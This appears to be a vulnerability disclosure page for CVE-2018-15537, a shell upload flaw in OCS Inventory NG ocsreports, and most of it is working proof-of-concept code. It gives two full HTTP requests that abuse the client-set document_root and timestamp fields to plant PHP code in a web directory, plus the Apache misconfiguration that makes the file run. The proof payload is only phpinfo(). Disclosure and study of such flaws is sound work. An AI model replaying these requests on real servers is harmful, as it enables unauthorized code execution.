OCS Inventory NG ocsreports Shell Upload

🗓️ 14 Nov 2018 00:00:00Reported by Simon UvarovType

packetstorm🔗 packetstormsecurity.com👁 218 Views

This request creates temporary PHP code file in /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory by uploading exploit.zip through ocsreports

Reporter	Title	Published	Views	Family All 13
0day.today	OCS Inventory NG ocsreports Shell Upload Vulnerability	14 Nov 201800:00	–	zdt
Circl	CVE-2018-15537	14 Nov 201815:59	–	circl
CVE	CVE-2018-15537	29 Nov 201821:00	–	cve
Cvelist	CVE-2018-15537	29 Nov 201821:00	–	cvelist
Debian CVE	CVE-2018-15537	29 Nov 201821:00	–	debiancve
EUVD	EUVD-2018-7413	7 Oct 202500:30	–	euvd
NVD	CVE-2018-15537	29 Nov 201821:29	–	nvd
OpenVAS	OCS Inventory NG <= 2.5.0 Remote Shell Upload Vulnerability	23 Nov 201800:00	–	openvas
OSV	DEBIAN-CVE-2018-15537	29 Nov 201821:29	–	osv
OSV	UBUNTU-CVE-2018-15537	29 Nov 201821:29	–	osv

`## Request 1  
  
This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.  
  
POST /ocsreports/index.php?function=tele_package HTTP/1.1  
Host: 192.168.5.135  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package  
Content-Type: multipart/form-data; boundary=---------------------------491299511942  
Content-Length: 2836  
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="CSRF_10"  
  
8ab3df2f9a2078530027e74191af0b087429ad41  
-----------------------------491299511942  
Content-Disposition: form-data; name="document_root"  
  
/usr/share/ocsinventory-reports/ocsreports/  
-----------------------------491299511942  
Content-Disposition: form-data; name="timestamp"  
  
a.php.a  
-----------------------------491299511942  
Content-Disposition: form-data; name="NAME"  
  
dshasdgasga  
-----------------------------491299511942  
Content-Disposition: form-data; name="DESCRIPTION"  
  
asdgasdga  
-----------------------------491299511942  
Content-Disposition: form-data; name="OS"  
  
WINDOWS  
-----------------------------491299511942  
Content-Disposition: form-data; name="PROTOCOLE"  
  
HTTP  
-----------------------------491299511942  
Content-Disposition: form-data; name="PRIORITY"  
  
5  
-----------------------------491299511942  
Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"  
Content-Type: application/x-zip-compressed  
  
<?php  
  
phpinfo();  
  
?>  
-----------------------------491299511942  
Content-Disposition: form-data; name="ACTION"  
  
EXECUTE  
-----------------------------491299511942  
Content-Disposition: form-data; name="ACTION_INPUT"  
  
asdgasdgasdg  
-----------------------------491299511942  
Content-Disposition: form-data; name="REDISTRIB_USE"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"  
  
d:\tele_ocs  
-----------------------------491299511942  
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"  
  
5  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_USER"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_TEXT"  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NEED_DONE_ACTION"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="valid"  
  
Send  
-----------------------------491299511942  
Content-Disposition: form-data; name="digest_algo"  
  
MD5  
-----------------------------491299511942  
Content-Disposition: form-data; name="digest_encod"  
  
Hexa  
-----------------------------491299511942  
Content-Disposition: form-data; name="download_rep_creat"  
  
/var/www/html/download/server/  
-----------------------------491299511942--  
  
## Request 2  
  
This request renames the file to a.php.a-1 and also creates info file.  
  
POST /ocsreports/index.php?function=tele_package HTTP/1.1  
Host: 192.168.5.135  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package  
Content-Type: multipart/form-data; boundary=---------------------------4827543632391  
Content-Length: 3345  
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="CSRF_13"  
  
53b6eab749060aa8cbe972e9c9a31ae148cf886b  
-----------------------------4827543632391  
Content-Disposition: form-data; name="tailleFrag"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="nbfrags"  
  
1  
-----------------------------4827543632391  
Content-Disposition: form-data; name="comment"  
  
asdgasdga  
-----------------------------4827543632391  
Content-Disposition: form-data; name="digest"  
  
b14f8d3b56fb10f2257f53ab32947a50  
-----------------------------4827543632391  
Content-Disposition: form-data; name="VALID_END"  
  
END  
-----------------------------4827543632391  
Content-Disposition: form-data; name="SIZE"  
  
347  
-----------------------------4827543632391  
Content-Disposition: form-data; name="document_root"  
  
/usr/share/ocsinventory-reports/ocsreports/  
-----------------------------4827543632391  
Content-Disposition: form-data; name="timestamp"  
  
a.php.a  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NAME"  
  
dshasdgasga  
-----------------------------4827543632391  
Content-Disposition: form-data; name="DESCRIPTION"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="OS"  
  
WINDOWS  
-----------------------------4827543632391  
Content-Disposition: form-data; name="PROTOCOLE"  
  
HTTP  
-----------------------------4827543632391  
Content-Disposition: form-data; name="PRIORITY"  
  
5  
-----------------------------4827543632391  
Content-Disposition: form-data; name="teledeploy_file"; filename=""  
Content-Type: application/octet-stream  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="ACTION"  
  
EXECUTE  
-----------------------------4827543632391  
Content-Disposition: form-data; name="ACTION_INPUT"  
  
asdgasdgasdg  
-----------------------------4827543632391  
Content-Disposition: form-data; name="REDISTRIB_USE"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"  
  
d:\tele_ocs  
-----------------------------4827543632391  
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"  
  
5  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_USER"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_TEXT"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NEED_DONE_ACTION"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="digest_algo"  
  
MD5  
-----------------------------4827543632391  
Content-Disposition: form-data; name="digest_encod"  
  
Hexa  
-----------------------------4827543632391  
Content-Disposition: form-data; name="download_rep_creat"  
  
/var/www/html/download/server/  
-----------------------------4827543632391--  
  
# Apache Config  
  
The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:  
  
AddType application/x-httpd-php .php  
  
Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1  
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext  
  
Regards,  
Simon Uvarov  
  
  
`

14 Nov 2018 00:00Current

8.8High risk

Vulners AI Score8.8

EPSS0.0229